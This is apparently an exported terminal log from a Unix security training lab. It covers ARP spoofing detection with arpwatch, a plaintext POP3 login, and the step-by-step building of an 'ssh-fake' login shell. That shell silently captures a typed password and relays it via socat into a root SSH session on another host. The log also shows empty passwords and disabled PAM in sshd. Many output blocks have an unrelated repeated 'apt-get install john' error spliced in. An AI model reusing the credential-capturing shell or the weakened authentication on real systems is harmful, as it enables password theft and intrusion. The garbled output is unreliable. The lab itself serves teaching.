#arp -an
[user@linux3:~]$ [user@linux3:~]$ [user@linux3:~]$ [user@linux3:~]$ [user@linux3:~]$ [user@linux3:~]$ [user@linux3:~]$ su Password: ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 |
#arp -an
GROUP 1 : 192.168.15.201 00:04:75:75:46:B1 GROUP 2 : 192.168.15.254 00:0A:01:D4:D1:39 Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help ? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 |
#arp -an
[root@linux2:~]# arp -an ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 [root@linux2:~]# arp -an ? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 [root@linux2:~]# arp -an ? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 [root@linux2:~]# ? (192.168.15.254) at 00:0A:01:D4:D1:E3 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 |
#nc 192.168.15.254 110
![]() . [root@linux2:~]# +OK USER user +OK PASS password +OK LIST +OK . |
#arp -an
PASS password +OK LIST +OK . [root@linux2:~]# arp -an ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 [root@linux2:~]# ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 |
#tcpdump -i eth0 arp
08:34:20.231680 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown) 08:34:21.259637 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown) 08:34:22.287591 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown) 08:34:23.315522 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:e3 (oui Unknown) 08:34:32.463255 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui Unknown) 08:34:33.491040 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui Unknown) 08:34:34.514988 arp reply 192.168.15.254 is-at 00:0a:01:d4:d1:39 (oui Unknown) 11 packets captured 11 packets received by filter 0 packets dropped by kernel |
#apt
![]() [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate bash: apt: command not found |
#apt-get install arpwatch
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 124kB of archives. After unpacking 389kB of additional disk space will be used. Get:1 http://debian.ZLO.ZLO.ZLO etch/main arpwatch 2.1a13-2 [124kB] Fetched 124kB in 0s (177kB/s) Selecting previously deselected package arpwatch. (Reading database ... 22406 files and directories currently installed.) Unpacking arpwatch (from .../arpwatch_2.1a13-2_i386.deb) ... Setting up arpwatch (2.1a13-2) ... Starting Ethernet/FDDI station monitor daemon: (chown arpwatch /var/lib/arpwatch/arp.dat) arpwatch. |
#ps aux | grep arpwatch
arpwatch 4810 0.5 0.4 3448 2360 ? S 08:36 0:00 /usr/sbin/arpwatch -u arpwatch -N -p root 4827 0.0 0.1 2852 712 pts/6 R+ 08:36 0:00 grep arpwatch |
#vi /etc/default/arpwatch
|
#cat /etc/default/arpwatch
# Global options for arpwatch(8). # Debian: don't report bogons, don't use PROMISC. ARGS="-N -p" # Debian: run as `arpwatch' user. Empty this to run as root. RUNAS="arpwatch" |
#tail -f /var/log/daemon.log
![]() Jun 21 08:37:08 s_all@linux2 arpwatch: new station 192.168.15.200 0:a:1:d4:d1:e3 eth0 Jun 21 08:37:08 s_all@linux2 arpwatch: new station 192.168.15.201 0:4:75:75:46:b1 eth0 Jun 21 08:37:09 s_all@linux2 arpwatch: new station 192.168.15.254 0:a:1:d4:d1:39 eth0 Jun 21 08:37:09 s_all@linux2 arpwatch: changed ethernet address 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0 Jun 21 08:37:11 s_all@linux2 arpwatch: ethernet mismatch 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0 Jun 21 08:37:12 s_all@linux2 arpwatch: ethernet mismatch 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0 Jun 21 08:37:13 s_all@linux2 arpwatch: ethernet mismatch 192.168.15.254 0:a:1:d4:d1:e3 (0:a:1:d4:d1:39) eth0 |
#arp -an
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate ? (192.168.15.254) at 00:0A:01:D4:D1:39 [ether] on eth0 ? (192.168.15.200) at 00:0A:01:D4:D1:E3 [ether] on eth0 |
#exit
exit Connection to linux3.unix.nt closed. slavrenyuk@linux2:~$ exit logout |
#tcsetattr: Input/output error
tcsetattr: Input/output error |
#tcsetattr: Input/output error
tcsetattr: Input/output error |
#ping linux3
PING linux3.unix.nt (192.168.15.200) 56(84) bytes of data. 64 bytes from 192.168.15.200: icmp_seq=1 ttl=64 time=0.190 ms --- linux3.unix.nt ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.190/0.190/0.190/0.000 ms |
#ping linux3
PING linux3.unix.nt (192.168.15.200) 56(84) bytes of data. 64 bytes from 192.168.15.200: icmp_seq=1 ttl=64 time=0.188 ms --- linux3.unix.nt ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.188/0.188/0.188/0.000 ms |
#man ping
|
#ping -a linux3
Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate PING linux3.unix.nt (192.168.15.200) 56(84) bytes of data. |
#apt-get install nessus
libgd2-noxpm libgdchart-gd2-noxpm libnessus2 nessus 0 upgraded, 4 newly installed, 0 to remove and 0 not upgraded. Need to get 566kB of archives. After unpacking 1597kB of additional disk space will be used. Do you want to continue [Y/n]? y Get:1 http://debian.ZLO.ZLO.ZLO etch/main libgd2-noxpm 2.0.33-5.2 [197kB] Get:2 http://debian.ZLO.ZLO.ZLO etch/main libgdchart-gd2-noxpm 0.11.5-3 [39.9kB] Get:3 http://debian.ZLO.ZLO.ZLO etch/main libnessus2 2.2.8-2 [97.6kB] Get:4 http://debian.ZLO.ZLO.ZLO etch/main nessus 2.2.8-1 [231kB] Fetched 566kB in 4s (117kB/s) ... Selecting previously deselected package libgdchart-gd2-noxpm. Unpacking libgdchart-gd2-noxpm (from .../libgdchart-gd2-noxpm_0.11.5-3_i386.deb) ... Selecting previously deselected package libnessus2. Unpacking libnessus2 (from .../libnessus2_2.2.8-2_i386.deb) ... Selecting previously deselected package nessus. Unpacking nessus (from .../nessus_2.2.8-1_i386.deb) ... Setting up libgd2-noxpm (2.0.33-5.2) ... Setting up libgdchart-gd2-noxpm (0.11.5-3) ... Setting up libnessus2 (2.2.8-2) ... Setting up nessus (2.2.8-1) ... |
#ssh 127.0.0.1
![]() The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42. Are you sure you want to continue connecting (yes/no)? no Host key verification failed. |
#ssh-keygen -lf /etc/ssh/ssh_
![]() [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate ssh_config ssh_host_dsa_key.pub ssh_host_rsa_key.pub ssh_host_dsa_key ssh_host_rsa_key |
#ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate 2048 a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42 /etc/ssh/ssh_host_rsa_key.pub |
#ssh-keygen -lf /etc/ssh/ssh_host_rsa_key.pub
![]() 2048 a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42 /etc/ssh/ssh_host_rsa_key.pub |
#man ssh
|
#man ssh
|
#ls /etc/ssh/
moduli sshd_config ssh_host_dsa_key.pub ssh_host_rsa_key.pub ssh_config ssh_host_dsa_key ssh_host_rsa_key |
#ls -l /etc/ssh/
total 140 -rw-r--r-- 1 root root 132777 2007-03-05 11:38 moduli -rw-r--r-- 1 root root 1424 2007-03-05 11:38 ssh_config -rw-r--r-- 1 root root 1874 2007-06-19 06:13 sshd_config -rw------- 1 root root 672 2007-06-19 06:13 ssh_host_dsa_key -rw-r--r-- 1 root root 601 2007-06-19 06:13 ssh_host_dsa_key.pub -rw------- 1 root root 1671 2007-06-19 06:13 ssh_host_rsa_key -rw-r--r-- 1 root root 393 2007-06-19 06:13 ssh_host_rsa_key.pub |
#vi ssh-fake
![]() |
#useradd -m slavrenyuk
================================================== [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate |
#passwd slavrenyuk
![]() Enter new UNIX password: Retype new UNIX password: No password supplied Enter new UNIX password: Retype new UNIX password: No password supplied Enter new UNIX password: Retype new UNIX password: No password supplied passwd: Authentication token manipulation error passwd: password unchanged |
#vi /etc/passwd
25c25 < slavrenyuk:x:1002:1002::/home/slavrenyuk:/bin/sh --- > slavrenyuk::1002:1002::/home/slavrenyuk:/bin/sh |
#vi /etc/ssh/sshd_config
43c43 < PermitEmptyPasswords no --- > PermitEmptyPasswords yes |
#ssh slavrenyuk@127.0.0.1
![]() This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is a5:a0:26:ce:b5:a1:f9:eb:d9:59:8b:f5:77:cf:55:42. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts. slavrenyuk@127.0.0.1's password: Permission denied, please try again. slavrenyuk@127.0.0.1's password: |
#/etc/init.d/ssh restart
Restarting OpenBSD Secure Shell server: sshd. |
#ssh slavrenyuk@127.0.0.1
![]() slavrenyuk@127.0.0.1's password: Permission denied, please try again. slavrenyuk@127.0.0.1's password: Permission denied, please try again. slavrenyuk@127.0.0.1's password: Permission denied (publickey,password). |
#apt-get install gdb
Reading package lists... Done Building dependency tree... Done Suggested packages: gdb-doc The following NEW packages will be installed: gdb 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 2411kB of archives. After unpacking 5181kB of additional disk space will be used. Get:1 http://debian.ZLO.ZLO.ZLO etch/main gdb 6.4.90.dfsg-1 [2411kB] Fetched 2411kB in 12s (192kB/s) Selecting previously deselected package gdb. (Reading database ... 22431 files and directories currently installed.) Unpacking gdb (from .../gdb_6.4.90.dfsg-1_i386.deb) ... Setting up gdb (6.4.90.dfsg-1) ... |
#ps aux | grep sshd
root 4499 0.0 0.4 7700 2364 ? Ss 08:22 0:00 sshd: root@pts/5 root 5662 0.0 0.2 4928 1092 ? Ss 12:11 0:00 /usr/sbin/sshd root 5723 0.0 0.1 2852 704 pts/6 R+ 12:13 0:00 grep sshd |
#gdb
GNU gdb 6.4.90-debian Copyright (C) 2006 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i486-linux-gnu". (gdb) attach 5662 Attaching to process 5662 Reading symbols from /usr/sbin/sshd...(no debugging symbols found)...done. ... Loaded symbols for /lib/tls/i686/cmov/libnss_compat.so.2 Reading symbols from /lib/tls/i686/cmov/libnss_nis.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/tls/i686/cmov/libnss_nis.so.2 Reading symbols from /lib/tls/i686/cmov/libnss_files.so.2... (no debugging symbols found)...done. Loaded symbols for /lib/tls/i686/cmov/libnss_files.so.2 Failed to read a valid object file image from memory. 0xb7f93410 in ?? () (gdb) detach Detaching from program: /usr/sbin/sshd, process 5662 |
#vi /etc/passwd
25c25 < slavrenyuk::1002:1002::/home/slavrenyuk:/bin/sh --- > slavrenyuk:x:1002:1002::/home/slavrenyuk:/bin/sh |
#vi /etc/pam.d/passwd
|
#vi /etc/pam.d/common-password
17c17 < password required pam_unix.so nullok obscure min=4 max=8 md5 --- > #password required pam_unix.so nullok obscure min=4 max=8 md5 |
#passwd slavrenyuk
![]() passwd: Permission denied passwd: password unchanged |
#vi /etc/pam.d/common-password
17c17 < #password required pam_unix.so nullok obscure min=4 max=8 md5 --- > password required pam_unix.so nullok #obscure min=4 max=8 md5 |
#passwd slavrenyuk
![]() Enter new UNIX password: Retype new UNIX password: No password supplied Enter new UNIX password: Retype new UNIX password: No password supplied Enter new UNIX password: Retype new UNIX password: No password supplied passwd: Authentication token manipulation error passwd: password unchanged |
#man passwd
|
#passwd -d slavrenyuk
Password changed. |
#ssh slavrenyuk@127.0.0.1
![]() slavrenyuk@127.0.0.1's password: Permission denied, please try again. slavrenyuk@127.0.0.1's password: |
#trap true 2
|
#vi /etc/ssh/sshd_config
77c77 < UsePAM yes --- > UsePAM no |
#/etc/init.d/ssh restart
Restarting OpenBSD Secure Shell server: sshd. |
#ssh slavrenyuk@127.0.0.1
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate slavrenyuk@linux2:~$ exit logout Connection to 127.0.0.1 closed. |
#ls
0_hfile_469_1.doc phpsyslogng-2.6.tar.gz ssh-fake phpsyslogng-2.6(2).tar.gz prilozenie_1_4.doc Tablitsa_1_1.xls |
#pwd
/root |
#ls -ld /root
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate drwxr-xr-x 8 root root 1024 2007-06-21 12:10 /root |
#vi /etc/shells
12a13 > /root/ssh-fake |
#chmod +x /root/ssh-fake
|
#usermod -s /root/ssh-fake slavrenyuk
================================================== [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate |
#ssh slavrenyuk@127.0.0.1
Last login: Thu Jun 21 12:18:53 2007 from localhost Password: Connection to 127.0.0.1 closed. |
#touch /home/slavrenyuk/.hushlogin
|
#ssh slavrenyuk@127.0.0.1
Password:rrrrrr Connection to 127.0.0.1 closed. |
#vi ssh-fake
3a4 > stty -echo 5c6 < #echo $password | socat - ssh ... --- > #echo $password | socat - EXEC:'ssh linux2.unix.nt |
#vi ssh-fake
6c6 < #echo $password | socat - EXEC:'ssh linux2.unix.nt --- > #echo $password | socat - EXEC:'ssh linux3.unix.nt',setsid,pty,ctty |
#vi ssh-fake
6c6 < #echo $password | socat - EXEC:'ssh linux3.unix.nt',setsid,pty,ctty --- > echo $password | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty |
#ssh root@linux3.unix.nt
![]() The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established. RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f. Are you sure you want to continue connecting (yes/no)? no Host key verification failed. |
#vi ssh-fake
|
#usermod -s /bin/bash slavrenyuk
================================================== [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate |
#su - lavrenyuk
![]() Unknown id: lavrenyuk |
#su - slavrenyuk
slavrenyuk@linux2:~$ ssh root@linux3.unix.nt The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established. RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'linux3.unix.nt,192.168.15.200' (RSA) to the list of known hosts. root@linux3.unix.nt's password: Last login: Thu Jun 21 16:01:31 2007 from linux1.local Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid |
#usermod -s /root/ssh-fake slavrenyuk
|
#ssh slavrenyuk@127.0.0.1
![]() Password:/root/ssh-fake: line 6: socat: command not found Connection to 127.0.0.1 closed. |
#apt-get install socat
Reading package lists... Done Building dependency tree... Done The following NEW packages will be installed: socat 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 213kB of archives. After unpacking 614kB of additional disk space will be used. Get:1 http://debian.ZLO.ZLO.ZLO etch/main socat 1.4.3.1-1 [213kB] Fetched 213kB in 0s (2692kB/s) Selecting previously deselected package socat. (Reading database ... 22450 files and directories currently installed.) Unpacking socat (from .../socat_1.4.3.1-1_i386.deb) ... Setting up socat (1.4.3.1-1) ... |
#ssh slavrenyuk@127.0.0.1
Password:123 Connection to 127.0.0.1 closed. |
#vi ssh-fake
5a6 > stty echo |
#./ssh-fake
Password:123 The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established. RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f. |
#vi ssh-fake
7c7 < echo $password | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty --- > ( sleep 2 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty |
#ssh slavrenyuk@127.0.0.1
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate Password:123 Connection to 127.0.0.1 closed. |
#ssh root@linux3.unix.nt
![]() The authenticity of host 'linux3.unix.nt (192.168.15.200)' can't be established. RSA key fingerprint is 40:6d:57:38:48:78:b2:fa:44:2f:f7:6d:da:9f:86:1f. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'linux3.unix.nt' (RSA) to the list of known hosts. root@linux3.unix.nt's password: |
#vi ssh-fake
7c7 < ( sleep 2 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty --- > ( sleep 4 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty |
#vi ssh-fake
|
#./ssh-fake
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate Password:123 |
#( sleep 4 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid
![]() ================================================== [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate |
#( sleep 4 ; echo ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty
![]() ================================================== [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate |
#( sleep 4 ; echo 123
![]() |
#( sleep 4 ; echo 123 ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,c
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate ty 123 |
#./ssh-fake
![]() |
#( sleep 4 ; echo 123 ; sleep 2; id; sleep 1; exit;) | socat - EXEC:'ssh roo
@lin 123 root@linux3.unix.nt's password: |
#( sleep 6
@linux3.unix.nt',setsid,pty,ctty root@linux3.unix.nt's password: Last login: Thu Jun 21 16:30:46 2007 from linux3.unix.nt Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid |
#( sleep 6 ; echo 123 ; sleep 2; ) | socat - EXEC:'ssh root@linux3.unix.nt',
![]() ================================================== [root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate |
#( sleep 6 ; echo 123 ; sleep 2; echo hostname; sleep 1; echo exit;) | socat
- EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty root@linux3.unix.nt's password: Last login: Thu Jun 21 16:32:54 2007 from 192.168.15.201 Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid hostname |
#( sleep 6 ; echo 123 ; sleep 2; echo hostname; sleep 1; echo exit;) | socat
![]() |
#( sleep 6 ; echo 123 ; sleep 2; echo hostname; ) | socat - EXEC:'ssh root@l
root@linux3.unix.nt's password: Last login: Thu Jun 21 16:34:09 2007 from 192.168.15.201 Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid |
#vi ssh-fake
7c7 < ( sleep 4 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty --- > ( sleep 6 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty |
#( sleep 4
![]() |
#./ssh-fake
![]() |
#ssh slavrenyuk@127.0.0.1
Password:root@linux3.unix.nt's password: Last login: Thu Jun 21 16:35:10 2007 from 192.168.15.201 Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid tcsetattr: Input/output error tcsetattr: Input/output error Connection to 127.0.0.1 closed. |
#vi ssh-fake
7c7,8 < ( sleep 6 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty --- > echo > ( sleep 6 ; echo $password ) | socat - EXEC:'ssh root@linux3.unix.nt',setsid,pty,ctty | sed '1,1d' |
#ssh slavrenyuk@127.0.0.1
Password: Last login: Thu Jun 21 16:36:43 2007 from 192.168.15.201 Linux linux3 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the indZLO.ZLO.ZLOl files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. l3-agent is already running: pid=5705; pidfile=/root/.lilalo/l3-agent.pid tcsetattr: Input/output error tcsetattr: Input/output error Connection to 127.0.0.1 closed. |
#pwd
[root@linux3:user]# apt-get install john Reading package lists... Done Building dependency tree... Done Package john is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source E: Package john has no installation candidate /root |
#ls
0_hfile_469_1.doc phpsyslogng-2.6.tar.gz ssh-fake phpsyslogng-2.6(2).tar.gz prilozenie_1_4.doc Tablitsa_1_1.xls |
# Global options for arpwatch(8). # Debian: don't report bogons, don't use PROMISC. ARGS="-N -p" # Debian: run as `arpwatch' user. Empty this to run as root. RUNAS="arpwatch"
Время первой команды журнала | 15:22:58 2007- 6-21 |
Время последней команды журнала | 19:38:37 2007- 6-21 |
Количество командных строк в журнале | 101 |
Процент команд с ненулевым кодом завершения, % | 10.89 |
Процент синтаксически неверно набранных команд, % | 1.98 |
Суммарное время работы с терминалом *, час | 1.35 |
Количество командных строк в единицу времени, команда/мин | 1.25 |
Частота использования команд |
|
В журнал автоматически попадают все команды, данные в любом терминале системы.
Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l bash: l: command not found |
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4 |
Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
$ find / -name abc find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C |
Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id uid=0(root) gid=0(root) Gruppen=0(root) |
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc
|
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и вставить скопированный текст:
$ patch ~/.bashrc |
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.
Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора.
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
$ whoami
user
$ #^ Интересно, кто я?
в журнале это будет выглядеть так:
$ whoami
user
Интересно, кто я? |
Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:
$ whoami
user
$ cat > /dev/null #^ Интересно, кто я?
Программа whoami выводит имя пользователя, под которым мы зарегистрировались в системе. - Она не может ответить на вопрос о нашем назначении в этом мире.
В журнале это будет выглядеть так:
$ whoami user
|
Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо символов #^ или #v нужно использовать символы #=.
1 2 3 4
Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сеанса, нужно щёлкнуть по этому названию.
LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008